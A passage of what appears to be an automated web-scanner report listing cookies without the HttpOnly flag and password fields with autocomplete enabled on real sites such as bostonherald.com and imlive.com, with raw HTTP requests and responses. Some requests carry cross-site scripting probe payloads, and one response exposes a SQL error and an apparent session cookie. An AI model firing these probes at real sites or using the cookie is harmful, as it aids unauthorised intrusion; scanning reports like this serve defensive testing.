ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
TalismaCookie=PPC.B.live chat.01/28/2011; expires=Sat, 28-Jan-2012 13:58:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tal_products/chat.aspx?ac=PPC.B.live%20chat HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.570. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/blogs/jets/2011/01/live-chat-friday-noon-1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.571. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.572. http://www.parkersoft.co.uk/client.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/client.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

whoson=530-50268.8034574; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.573. http://www.parkersoft.co.uk/supnotes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/supnotes.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

whoson=584-50288.6160842; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /supnotes.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:58:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wd23wlvl4tjcz4554zaqcfyv; path=/; HttpOnly
Set-Cookie: whoson=584-50288.6160842; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...

11.574. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 15:00:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:00:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:08 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.576. http://www.zvents.com/zat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/zat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zat?r=&url=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ea7771aeaee3%3D1&uid=Xu3uTnqUd1-EIF3JztHR7Q&src=zmp&pid=150&pt=homepage&sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220&type=view&cm=featured&oids=e%3A139733045%2Ce%3A155300665%2Ce%3A147270025%2Ce%3A142549185%2Ce%3A148455425%2Ce%3A151637365%2Ce%3A154912025%2Ce%3A155222925%2Ce%3A152086945%2Ce%3A161856385&spids=&__t=1296236235556 HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 28 Jan 2011 17:37:26 GMT
Content-Type: image/gif
Connection: keep-alive
X-Rack-Cache: miss
Cache-Control: private
Set-Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;
Set-Cookie: _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; path=/; expires=Thu, 28-Apr-2011 17:37:26 GMT; HttpOnly
Content-Length: 42

GIF89a.............!.......,...........D.;

11.577. http://xads.zedo.com/ads2/c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xads.zedo.com
Path:	/ads2/c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:31 GMT; DOMAIN=.zedo.com
ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:31 GMT;DOMAIN=.zedo.com;path=/;
PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:31 GMT; DOMAIN=.zedo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12. Password field with autocomplete enabled previous next
There are 175 instances of this issue:

http://ar.imlive.com/
http://bostonherald.com/track/inside_track/view.bg
http://bostonherald.com/track/star_tracks/view.bg
http://bostonherald.com/users/login
http://bostonherald.com/users/register/
http://br.imlive.com/
http://cafr.imlive.com/
http://de.imlive.com/
http://digg.com/submit
http://digg.com/submit
http://dk.imlive.com/
http://es.imlive.com/
http://fr.imlive.com/
http://gr.imlive.com/
http://imlive.com/
http://imlive.com/homepagems3.asp
http://imlive.com/webcam-login/
http://in.imlive.com/
http://it.imlive.com/
http://jp.imlive.com/
http://mx.imlive.com/
http://nl.imlive.com/
http://no.imlive.com/
http://pu.imlive.com/
http://ru.imlive.com/
http://se.imlive.com/
http://support.moxiesoft.com/
http://tr.imlive.com/
http://twitter.com/
http://twitter.com/247realmedia
http://twitter.com/AddThis
http://twitter.com/Applebees
http://twitter.com/AshieApple
http://twitter.com/Beckett_News
http://twitter.com/BosHerald_Edge/
http://twitter.com/ChrisLambton13
http://twitter.com/ConanOBrien
http://twitter.com/DustinPedroia15
http://twitter.com/ExpertDan
http://twitter.com/GQMagazine
http://twitter.com/Gr8BosFoodBank
http://twitter.com/Harvard
http://twitter.com/Jarvis_Green
http://twitter.com/JennyMcCarthy
http://twitter.com/John_W_Henry
http://twitter.com/KaseyRKahl
http://twitter.com/KhloeKardashian
http://twitter.com/KimKardashian
http://twitter.com/Late_Show
http://twitter.com/LibertyHotel
http://twitter.com/Michael_Joseph
http://twitter.com/MittRomney
http://twitter.com/NewYorkPost
http://twitter.com/Nicole_114
http://twitter.com/Oprah
http://twitter.com/PageLines
http://twitter.com/PhantomGourmet
http://twitter.com/Prucenter
http://twitter.com/PureADK
http://twitter.com/ROBERTPLANT
http://twitter.com/RealLamarOdom
http://twitter.com/RobertDuffy
http://twitter.com/ScampoLiberty
http://twitter.com/Script_Junkie
http://twitter.com/Sean_P_Doyle
http://twitter.com/Servigistics
http://twitter.com/ShaunieONeal
http://twitter.com/Simply_b06
http://twitter.com/Siobhan_Magnus
http://twitter.com/SlexAxton
http://twitter.com/StarWrit
http://twitter.com/Support
http://twitter.com/Svantasukhai
http://twitter.com/THE_REAL_SHAQ
http://twitter.com/TV38Boston
http://twitter.com/TechCrunch
http://twitter.com/TheKateBosworth
http://twitter.com/Trackgals
http://twitter.com/Trackgals/
http://twitter.com/_juliannemoore
http://twitter.com/ajpiano
http://twitter.com/androidnewsblog
http://twitter.com/backstreetboys
http://twitter.com/benmezrich
http://twitter.com/bennadel
http://twitter.com/bostonherald
http://twitter.com/cjronson
http://twitter.com/cowboy
http://twitter.com/creationix
http://twitter.com/dandenney
http://twitter.com/danwrong
http://twitter.com/davevogler
http://twitter.com/deionbranch84
http://twitter.com/dougneiner
http://twitter.com/ebello
http://twitter.com/ericmmartin
http://twitter.com/gercheq
http://twitter.com/harvardlampoon
http://twitter.com/j_hollender
http://twitter.com/jayleno
http://twitter.com/jbchang
http://twitter.com/joedwinell/
http://twitter.com/joemccann
http://twitter.com/jordanknight
http://twitter.com/kennychesney
http://twitter.com/kfaulk33
http://twitter.com/lapubell
http://twitter.com/login
http://twitter.com/malsup
http://twitter.com/malsup/favorites
http://twitter.com/malsup/lists/memberships
http://twitter.com/mariamenounos
http://twitter.com/mattbanks
http://twitter.com/mennovanslooten
http://twitter.com/messengerpost
http://twitter.com/miketaylr
http://twitter.com/moxiesoft
http://twitter.com/onlyjazz
http://twitter.com/oschina
http://twitter.com/rachbarnhart
http://twitter.com/rem
http://twitter.com/rickrussie
http://twitter.com/roctimo
http://twitter.com/rwaldron
http://twitter.com/ryanolson
http://twitter.com/scott_gonzalez
http://twitter.com/search
http://twitter.com/sentience
http://twitter.com/simplemodal
http://twitter.com/sitepointdotcom
http://twitter.com/slaterusa
http://twitter.com/stubbornella
http://twitter.com/thehomeorg
http://twitter.com/townsandtrails
http://twitter.com/travis
http://twitter.com/tylerseguin92
http://twitter.com/waynecountylife
http://twitter.com/webandy
http://twitter.com/zonajones
http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also
http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also
http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6
http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also
http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2
http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also
http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5
http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1
http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0
http://www.bostonherald.com/news/regional/view.bg
http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also
http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4
http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also
http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7
http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also
http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3
http://www.bostonherald.com/users/register
http://www.bostonherald.com/users/register/
http://www.paperg.com/
https://www.paperg.com/post.php
https://www.paperg.com/post.php
http://www.parker-software.com/forum/
http://www.parkersoft.co.uk/client.aspx
http://www.screenthumbs.com/
http://www.screenthumbs.com/about
http://www.screenthumbs.com/contact
http://www.screenthumbs.com/forgot
http://www.screenthumbs.com/linkthumbs
http://www.screenthumbs.com/plugins
http://www.screenthumbs.com/service
http://www.screenthumbs.com/signup
http://www.screenthumbs.com/signup.php
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

12.1. http://ar.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://ar.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.2. http://bostonherald.com/track/inside_track/view.bg previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view.bg

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/track/inside_track/view.bg?articleid=1312557&format=comments&srvc=track&position=2

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.3. http://bostonherald.com/track/star_tracks/view.bg previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view.bg

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/track/star_tracks/view.bg?articleid=1312549&format=comments&srvc=track&position=3

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.4. http://bostonherald.com/users/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/login

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/users/login?returnto=/users/

The form contains the following password field with autocomplete enabled:

password

Request

GET /users/login HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.5. http://bostonherald.com/users/register/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/register/

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/users/register/

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

GET /users/register/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.6. http://br.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://br.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.7. http://cafr.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://cafr.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.8. http://de.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://de.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.9. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL:

http://digg.com/submit?phase=2&url=http://www.bostonherald.com

The form contains the following password field with autocomplete enabled:

password

Request

GET /submit?phase=2&url=http://www.bostonherald.com HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.10. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL:

http://digg.com/submit

The form contains the following password field with autocomplete enabled:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.11. http://dk.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://dk.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.12. http://es.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://es.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.13. http://fr.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fr.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://fr.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.14. http://gr.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://gr.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.15. http://imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0W5s89nS82L1Y30bT54fyWa09YbZxWHM4PkcHt5cVPiM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:16 GMT
Connection: close
Content-Length: 18944
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.16. http://imlive.com/homepagems3.asp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/homepagems3.asp

Issue detail

The page contains a form with the following action URL:

http://imlive.com/homepagems3.asp?

The form contains the following password field with autocomplete enabled:

header_password

Request

Response

12.17. http://imlive.com/webcam-login/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-login/

Issue detail

The page contains a form with the following action URL:

http://imlive.com/webcam-login/

The form contains the following password field with autocomplete enabled:

txtPassword

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:06:25 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 21541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<div class="LoginPart minH">
<form onsubmit="return IsValidLogin(this)" method="post" name="frm">
<span id="ctl00_BodyContentPlaceHolder_lWelcome" class="loginWelcome">
...[SNIP]...
</label>
<input type="password" id="txtPassword" name="txtPassword" tabindex="2" />
<input type="submit" value="Submit" tabindex="4" />
...[SNIP]...

12.18. http://in.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://in.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://in.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.19. http://it.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://it.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.20. http://jp.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://jp.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://jp.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.21. http://mx.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mx.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://mx.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.22. http://nl.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
